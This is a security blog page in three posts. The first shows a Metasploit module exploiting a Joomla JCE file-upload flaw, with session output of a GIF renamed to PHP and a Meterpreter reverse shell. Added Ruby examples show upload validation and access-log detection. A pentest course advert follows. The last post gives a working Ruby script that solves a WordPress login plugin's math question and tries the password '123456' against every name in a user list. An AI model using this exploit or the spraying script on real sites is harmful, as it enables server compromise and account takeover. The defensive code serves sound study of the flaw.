Wednesday, March 27, 2013

Joomla Component JCE File Upload Remote Code Execution Metasploit Module


msf > use exploit/unix/webapp/joomla_comjce_imgmanager 
msf exploit(joomla_comjce_imgmanager) > info

       Name: Joomla Component JCE File Upload Remote Code Execution
     Module: exploit/unix/webapp/joomla_comjce_imgmanager
    Version: 0
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  Heyder Andrade

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        Use a proxy chain
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       Joomla directory path
  VHOST                       no        HTTP server virtual host

Payload information:
  Space: 4000
  Avoid: 1 characters

  This module exploits a vulnerability in the JCE component for 
  Joomla! that allows an unauthenticated remote attacker to upload 
  arbitrary files, because the component fails to sufficiently 
  sanitize user-supplied input. By sending a specially crafted HTTP 
  request, a remote attacker can upload a malicious PHP script and 
  execute arbitrary PHP code on the vulnerable system. This module 
  has been tested successfully against JCE Editor 1.5.71 and 
  Joomla 1.5.26.
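The session output below shows the pattern the module relies on: the image manager accepts cpizwa.gif, then lets the client rename it to cpizwa.php. The following Ruby is an added example (not the module's code and not JCE's) that models an extension allowlist enforced only at upload time next to a hardened version that re-validates every name the client supplies, on upload and on rename. The allowlist, the function names and the rejected extension list are assumptions for illustration.

```ruby
# Added example, not JCE code: an allowlist checked at upload time only, beside
# a version that re-checks on every operation. Names and lists are assumptions.
ALLOWED_EXTENSIONS = %w[.gif .jpg .jpeg .png].freeze

# Weak model of what the module output shows: the allowlist is applied when a
# file is uploaded, but a later rename request is not checked against it, so
# cpizwa.gif -> cpizwa.php is accepted and the file becomes executable.
def weak_upload_allowed?(filename)
  ALLOWED_EXTENSIONS.include?(File.extname(filename).downcase)
end

def weak_rename_allowed?(_old_name, _new_name)
  true
end

# Hardened: one validator applied to every client-supplied name.
#  - bare filename only (no directory components, no leading dot, no control
#    characters such as a null byte), at least one extension
#  - final extension must be on the allowlist
#  - no inner segment may be a server-side extension (shell.php.gif)
def safe_name?(filename)
  name = filename.to_s
  return false unless name.match?(/\A[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)+\z/)
  segments = name.split('.')
  return false unless ALLOWED_EXTENSIONS.include?(".#{segments.last.downcase}")
  segments[1..-2].none? { |s| s.match?(/\A(php\d?|phtml|phar)\z/i) }
end

def hardened_upload_allowed?(filename)
  safe_name?(filename)
end

def hardened_rename_allowed?(old_name, new_name)
  safe_name?(old_name) && safe_name?(new_name)
end
```

Two caveats a practitioner would add: a magic-byte check on the uploaded content does not help here, because a valid GIF header can be prepended to a PHP payload and the file still executes once it carries a .php name; and the upload directory should additionally be served with script execution disabled, so that a name check that does slip is not enough on its own.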


msf exploit(joomla_comjce_imgmanager) > set RHOST
msf exploit(joomla_comjce_imgmanager) > exploit 

[*] Started reverse handler on 
[*] Checking component version to
[+] Successfully uploaded cpizwa.gif
[*] Change Extension from cpizwa.gif to cpizwa.php
[+] Renamed cpizwa.gif to cpizwa.php
[*] Calling payload: cpizwa.php
[*] Sending stage (39217 bytes) to
[*] Meterpreter session 1 opened ( -> at Wed Mar 27 22:14:31 -0300 2013
[+] Deleted cpizwa.php

meterpreter > getuid 
Server username: www-data (33)
meterpreter > shell
Process 7445 created.
Channel 0 created.
Terminate channel 0? [y/N]  y
meterpreter > quit
[*] Shutting down Meterpreter...

[*] - Meterpreter session 1 closed.  Reason: User exit
msf exploit(joomla_comjce_imgmanager) > 
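The session above leaves few artefacts on disk: the module uploads cpizwa.gif, renames it to cpizwa.php, calls it once and then deletes it, so the web server access log may be the only record of what happened. The following Ruby is an added example (not part of the original post or of the module) that flags requests for a server-side script under an image upload directory and raises the severity when the same client sent a POST shortly before. The log lines are constructed for this example, the upload directory list and the request paths are assumptions, and the exact JCE request parameters are not reproduced.

```ruby
require 'time'

# Constructed Apache combined-log lines for this example (not a real capture).
# The component URL is only sketched as option=com_jce; real parameters vary.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [27/Mar/2013:22:14:29 -0300] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  203.0.113.7 - - [27/Mar/2013:22:14:30 -0300] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager HTTP/1.1" 200 64 "-" "Mozilla/5.0"
  203.0.113.7 - - [27/Mar/2013:22:14:31 -0300] "GET /images/stories/cpizwa.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.4 - - [27/Mar/2013:22:15:02 -0300] "GET /images/stories/photo.gif HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
  198.51.100.9 - - [27/Mar/2013:23:40:10 -0300] "GET /images/stories/old.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
LOG

LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/
EXEC_EXT    = /\.(php\d?|phtml|phar)(\?|\z)/i   # extensions the server would execute
UPLOAD_DIRS = %w[/images/ /media/].freeze       # assumed upload roots for this install
WINDOW      = 120                               # seconds between a POST and the GET

# Parse one combined-log line into a hash, or nil if it does not match.
def parse_line(line)
  m = LOG_RE.match(line) or return nil
  {
    ip: m[:ip],
    time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method],
    path: m[:path],
    status: m[:status].to_i
  }
end

# Walk the log once. Remember the last POST per client; any request for an
# executable extension under an upload directory is an alert, "high" when that
# client POSTed within WINDOW seconds (upload then call), "medium" otherwise
# (probing for a previously dropped file, or an unrelated leftover).
def detect(lines)
  last_post = {}
  alerts = []
  lines.each do |line|
    e = parse_line(line) or next
    if e[:method] == 'POST'
      last_post[e[:ip]] = e[:time]
      next
    end
    next unless UPLOAD_DIRS.any? { |d| e[:path].start_with?(d) }
    next unless e[:path].match?(EXEC_EXT)
    prior = last_post[e[:ip]]
    severity = prior && (e[:time] - prior) <= WINDOW ? 'high' : 'medium'
    alerts << { ip: e[:ip], path: e[:path], status: e[:status], severity: severity }
  end
  alerts
end

if __FILE__ == $PROGRAM_NAME
  detect(SAMPLE_LOG.lines).each do |a|
    puts "#{a[:severity]}: #{a[:ip]} requested #{a[:path]} (HTTP #{a[:status]})"
  end
end
```

A 404 on a .php name under the images directory is still worth an alert: it is either a scanner looking for a dropped shell or a failed attempt, and because the module deletes its file after use, a clean directory listing at investigation time proves nothing.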


Thursday, March 21, 2013

Course – Pentest Hands ON!

This course covers the main techniques for conducting a remote pentest (penetration test) today. The course is 100% hands-on and covers new and old methods, techniques and tools used in conducting a remote pentest. For this, real (online) labs are used, rather than the well-known virtual machines full of contrived vulnerabilities that do not reflect reality.
The test results will be based on real scenarios, which will qualify the student to conduct a pentest and produce a commercial report. At the end of the course the student will be able to carry out a remote pentest and identify vulnerabilities and threats, determining the risks and criticality levels of each vulnerability or remote attack in the tested environment.

Friday, August 19, 2011

WordPress "Block-Spam-By-Math-Reloaded" plugin bypass

"Plugin description: This plugin protects your Wordpress 3.x login, comments, and new user/new blog signup process against spambots with a simple math question."


However, the math question really is simple and can be bypassed trivially. The plugin generates two random numbers between 2 and 15 and asks the user to enter their sum.

The script below is a PoC showing how to bypass the plugin on the wp-login.php page: it reads the two operands from the login form, submits their sum along with each login attempt, and solves the fresh question that comes back with every response.

#!/usr/bin/env ruby

require 'uri'
require 'net/http'
require 'cgi'

# Request Config
base_url = "http://[TARGET]/wp-login.php"

# Proxy Config (fill in the address, or set use_proxy = false to connect directly)
use_proxy = true
proxy_address = ''
proxy_port = '8080'

# Headers config
cookie = ''
useragent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20060111 Firefox/'
headers = {
  'Host' => URI.parse(base_url).host,
  'Content-Type' => 'application/x-www-form-urlencoded',
  'User-Agent' => useragent,
  'Cookie' => cookie
}

# build the HTTP client, through the proxy when requested
def built_request(url, use_proxy, proxy_address, proxy_port)
  if use_proxy
    return Net::HTTP.new(url.host, url.port, proxy_address, proxy_port.to_i)
  end
  Net::HTTP.new(url.host, url.port)
end

# answer the question: the plugin only ever asks for the sum of the two operands
def smartaleck(values)
  answer = 0
  values.each { |a| answer += a.to_i }
  return answer
end

# pull the two operands out of the login form. The original expression was lost
# in extraction; this one assumes the plugin renders them as hidden inputs named
# mathvalue0 and mathvalue1 (the same names the POST below sends back).
def getvalues(response)
  i = 0
  values = []
  while (i <= 1) do
    if response.body =~ /name=["']mathvalue#{i}["'][^>]*value=["'](\d+)["']/
      values[i] = $1
    end
    i += 1
  end
  return values
end

# base request: fetch the form once to get the first question
url = URI.parse(base_url)
$http = built_request(url, use_proxy, proxy_address, proxy_port)
resp = $http.request_get(url.path)

v = getvalues(resp)
$sec_answer = smartaleck(v)
puts "#{v[0]} + #{v[1]} = #{$sec_answer}"

# File contains one user per line
users = File.open('files/user.txt', 'r')

# Fixed password
pass = '123456'

users.each do |user|
  begin
    payload = "log=#{user.chomp}&pwd=#{pass}&mathvalue2=#{$sec_answer}&mathvalue0=#{v[0]}&mathvalue1=#{v[1]}&wp-submit=Log+In&redirect_to=#{CGI::escape("http://#{url.host}/wp-admin/")}&testcookie=1"
    resp = $http.request_post(url.path, payload, headers)
    puts "#{user.chomp}: HTTP #{resp.code}"
    # every response carries a fresh question; solve it for the next attempt
    v = getvalues(resp)
    $sec_answer = smartaleck(v)
    puts "#{v[0]} + #{v[1]} = #{$sec_answer}"
  rescue Timeout::Error
    puts "Time out"
  end
end


I believe the good old captcha, well implemented, is still a better solution for these cases.